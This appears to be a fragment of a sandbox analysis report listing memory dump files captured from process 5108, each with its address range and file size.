  • memory/5108-172-0x0000022BDE080000-0x0000022BDE15F000-memory.dmp

    Filesize

    892KB

  • memory/5108-158-0x0000022BDE080000-0x0000022BDE15F000-memory.dmp

    Filesize

    892KB

  • memory/5108-155-0x0000022BDE080000-0x0000022BDE15F000-memory.dmp

    Filesize

    892KB

  • memory/5108-153-0x0000022BDE080000-0x0000022BDE15F000-memory.dmp

    Filesize

    892KB

  • memory/5108-149-0x0000022BDE080000-0x0000022BDE15F000-memory.dmp

    Filesize

    892KB

  • memory/5108-145-0x0000022BDE080000-0x0000022BDE15F000-memory.dmp

    Filesize

    892KB

  • memory/5108-142-0x0000022BDE080000-0x0000022BDE15F000-memory.dmp

    Filesize

    892KB

  • memory/5108-139-0x0000022BDE080000-0x0000022BDE15F000-memory.dmp

    Filesize

    892KB

  • memory/5108-132-0x00007FFB2F740000-0x00007FFB30201000-memory.dmp

    Filesize

    10.8MB

  • memory/5108-131-0x0000022BDE080000-0x0000022BDE164000-memory.dmp

    Filesize

    912KB